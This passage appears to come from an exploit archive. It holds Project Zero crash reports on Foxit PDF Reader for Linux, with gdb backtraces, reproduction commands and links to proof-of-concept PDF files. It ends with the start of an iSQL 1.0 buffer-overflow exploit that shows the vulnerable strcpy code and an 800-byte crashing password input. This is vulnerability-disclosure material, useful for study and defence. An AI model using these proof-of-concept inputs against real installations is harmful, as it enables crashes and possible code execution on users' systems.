#26 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#27 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#28 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#29 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#30 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#31 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#32 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#33 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
---Type <return> to continue, or q <return> to quit---
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#34 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#35 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#36 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#37 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#38 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#39 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#40 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#41 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#42 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#43 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#44 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#45 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#46 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#47 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#48 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
#49 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#50 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#51 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#52 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#53 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#54 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#55 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:310
(gdb) x/10i $rip
=> 0x7fb462 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+188>: mov 0x2(%rbp),%dl
0x7fb465 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+191>: add $0x3,%r13
0x7fb469 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+195>: add $0x3,%rbp
0x7fb46d <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+199>: inc %eax
0x7fb46f <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+201>: mov %dl,-0x3(%r13)
0x7fb473 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+205>: mov -0x2(%rbp),%dl
0x7fb476 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+208>: mov %dl,-0x2(%r13)
0x7fb47a <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+212>: mov -0x3(%rbp),%dl
0x7fb47d <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+215>: mov %dl,-0x1(%r13)
0x7fb481 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+219>:
jmp 0x7fb459 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+179>
(gdb) info reg $rbp
rbp 0x1a30fff 0x1a30fff
--- cut ---
Attached is a proof of concept PDF file.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39941.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=745
We have identified the following crash due to an invalid read in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
The DISPLAY=:1 environment variable is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
An example excerpt from the crash log is as follows:
--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x0000000000ab467f in CFX_WideString::operator=(CFX_WideString const&) ()
(gdb) where
#0 0x0000000000ab467f in CFX_WideString::operator=(CFX_WideString const&) ()
#1 0x00000000006c53a8 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) ()
#2 0x00000000006c5357 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) ()
#3 0x00000000006c5357 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) ()
#4 0x00000000006c6364 in CRichTextXML::ParseXML2Text() ()
#5 0x00000000006c6a33 in CRichTextXML::SetXML(wchar_t const*, wchar_t const*) ()
#6 0x00000000006c9d49 in CFX_Edit::SetRichTextByXML(wchar_t const*, wchar_t const*, int, int) ()
#7 0x000000000067e995 in CPWL_Note_Contents::SetRichText(CFX_WideString const&) ()
#8 0x000000000067e9e5 in CPWL_NoteItem::SetRichContents(CFX_WideString const&) ()
#9 0x00000000005cbcc7 in CMarkup_Popup::SetNoteContents(CFX_WideString const&, CReader_PageView*) ()
#10 0x00000000005ca0e7 in CMarkup_Popup::InitNote(CReader_PageView*) ()
#11 0x00000000005ca420 in CMarkup_Popup::CreateNote(CReader_PageView*, int) ()
#12 0x00000000005cd578 in CMarkup_Popup::UpdateNote(CReader_PageView*, int) ()
#13 0x00000000005d2475 in CMarkup_AnnotHandler::OnPageVisible(CReader_PageView*, CReader_Annot*) ()
#14 0x00000000006e733e in CTA_AnnotHandler::OnPageVisible(CReader_PageView*, CReader_Annot*) ()
#15 0x0000000000640424 in CBA_PageEventHandler::OnPageVisible(CReader_PageView*) ()
#16 0x0000000000461d1b in CReader_AppEx::OnPageVisible (this=0x14a5120, pDocView=0x19446a0)
at ../../Readerlite/ReaderLite/src/frd_appex.cpp:2901
#17 0x0000000000450bec in CReader_ViewPage::DoPageVisibleAction (this=0x1944670)
at ../../Readerlite/ReaderLite/src/preview.cpp:3204
x#18 0x000000000044b980 in CPDF_TVPreview::Slot_DoPageVisibleEvent (this=0x1943180)
at ../../Readerlite/ReaderLite/src/preview.cpp:1443
#19 0x000000000044e333 in CPDFViewerEventHandler::OnFinishRender (this=0x194c520)
at ../../Readerlite/ReaderLite/src/preview.cpp:2386
#20 0x000000000061db28 in CPDFViewerEx::ContinueRendering() ()
#21 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
#22 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x1943180)
at ../../Readerlite/ReaderLite/src/preview.cpp:1305
#23 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#24 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#25 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#26 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#27 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#28 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#29 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#30 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#31 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#32 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#33 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#34 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#35 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#36 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
---Type <return> to continue, or q <return> to quit---
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#37 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#38 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#39 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#40 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#41 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#42 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#43 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#44 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#45 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#46 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#47 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#48 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#49 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#50 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#51 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#52 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
#53 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#54 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#55 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#56 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#57 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#58 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#59 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:310
(gdb) x/10i $rip
=> 0xab467f <_ZN14CFX_WideStringaSERKS_+51>: cmpq $0x0,0x0(%r13)
0xab4684 <_ZN14CFX_WideStringaSERKS_+56>: js 0xab4692 <_ZN14CFX_WideStringaSERKS_+70>
0xab4686 <_ZN14CFX_WideStringaSERKS_+58>: test %rbp,%rbp
0xab4689 <_ZN14CFX_WideStringaSERKS_+61>: je 0xab46a3 <_ZN14CFX_WideStringaSERKS_+87>
0xab468b <_ZN14CFX_WideStringaSERKS_+63>: cmpq $0x0,0x0(%rbp)
0xab4690 <_ZN14CFX_WideStringaSERKS_+68>: jns 0xab46a3 <_ZN14CFX_WideStringaSERKS_+87>
0xab4692 <_ZN14CFX_WideStringaSERKS_+70>: mov 0x8(%rbp),%esi
0xab4695 <_ZN14CFX_WideStringaSERKS_+73>: lea 0x10(%rbp),%rdx
0xab4699 <_ZN14CFX_WideStringaSERKS_+77>: mov %rbx,%rdi
0xab469c <_ZN14CFX_WideStringaSERKS_+80>: callq 0xab45a8 <_ZN14CFX_WideString10AssignCopyEiPKw>
(gdb) info reg $r13
r13 0x740000006e 498216206446
--- cut ---
Attached is a proof of concept PDF file.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39942.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=741
We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
$ MALLOC_CHECK_=3 DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
The MALLOC_CHECK_=3 environment variable is used to enforce strict checks in the libc memory allocator, while DISPLAY=:1 is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
An example excerpt from the crash log is as follows:
--- cut ---
*** Error in `FoxitReader': free(): invalid pointer: 0x0000000001930a60 ***
[New Thread 0x7fffdfa16700 (LWP 26721)]
[New Thread 0x7fffe0217700 (LWP 26720)]
[New Thread 0x7fffe0a18700 (LWP 26718)]
[New Thread 0x7fffe97cd700 (LWP 26717)]
Program received signal SIGABRT, Aborted.
0x00007ffff4fc0cb7 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) where
#0 0x00007ffff4fc0cb7 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1 0x00007ffff4fc40a8 in __GI_abort () at abort.c:89
#2 0x00007ffff4ffd2f4 in __libc_message (do_abort=do_abort@entry=1,
fmt=fmt@entry=0x7ffff510b988 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175
#3 0x00007ffff500bef6 in malloc_printerr (ptr=<optimized out>,
str=0x7ffff5107a79 "free(): invalid pointer", action=1) at malloc.c:4996
#4 free_check (mem=<optimized out>, caller=<optimized out>) at hooks.c:298
#5 0x00000000007c823f in CPDF_StreamContentParser::~CPDF_StreamContentParser() ()
#6 0x00000000007c9504 in CPDF_ContentParser::Continue(IFX_Pause*, int) ()
#7 0x00000000007b97d9 in CPDF_PageObjects::ContinueParse(IFX_Pause*) ()
#8 0x000000000047a8b4 in CReader_PageEx::ParsePage (this=0x191f7e0)
at ../../Readerlite/ReaderLite/src/frd_pageex.cpp:792
#9 0x0000000000490415 in CPDFViewerContentProvider::ParsePage (this=0x191ea60, nPage=0)
at ../../Readerlite/ReaderLite/src/pdfviewercontentprovider.cpp:23
#10 0x000000000061da5f in CPDFViewerEx::DrawPages(CFX_DIBitmap*) ()
#11 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) ()
#12 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() ()
#13 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
#14 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x191efe0)
at ../../Readerlite/ReaderLite/src/preview.cpp:1305
#15 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#16 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#17 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#18 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#19 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#20 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#21 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#22 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#23 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#24 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#25 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#26 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#27 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#28 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#29 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#30 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#31 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#32 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
---Type <return> to continue, or q <return> to quit---
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#33 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#34 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#35 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#36 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#37 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#38 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#39 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#40 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#41 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#42 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#43 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#44 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
#45 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#46 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#47 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#48 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#49 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#50 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#51 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:310
--- cut ---
Attached are six proof of concept PDF files: three derived from an original file named 172.pdf in our original corpus, and three derived from 5659.pdf. While the two groups of files generate crashes with slightly different stack traces, the overall symptoms are similar enough to assume they expose the same bug in the code.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39940.zip
#!/bin/ruby
# Exploit Title: iSQL(RL) 1.0 - Buffer Overflow(isql_main.c)
# Date: 2016-06-13
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/roselone/iSQL
# Software Link: https://github.com/roselone/iSQL/archive/master.zip
# Version: 1.0
# Tested on: Debian [wheezy]
# CVE : none
=begin
### Vulnerability Point
:: [isql_main.c 453 line] strcpy((char *)cmd+5,str); code is vulnerable
:: don't check str size
446 char *get_MD5(char *str){
447 FILE *stream;
448 char *buf=malloc(sizeof(char)*33);
449 char cmd[100];
450 memset(buf,'\0',sizeof(buf));
451 memset(cmd,'\0',sizeof(cmd));
452 strcpy(cmd,"echo "); //5
453 strcpy((char *)cmd+5,str);
Edit makefile > CFLAGS = -fno-stack-protector
#> make
### gdb history
(gdb) r
Starting program: /home/noon/Noon/LAB/exploit/vuln_test/iSQL/isql
*************** welcome to ISQL ****************
* version 1.0 *
* Designed by RL *
* Copyright (c) 2011, RL. All rights reserved *
************************************************
>username: hwul_test
>password: AAAAAAAAAAAAAAAAAAAAAAAAAA... ("A" * 800)
Program received signal SIGSEGV, Segmentation fault.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0x000000000040644c in get_MD5 ()
(gdb) x/s $rax
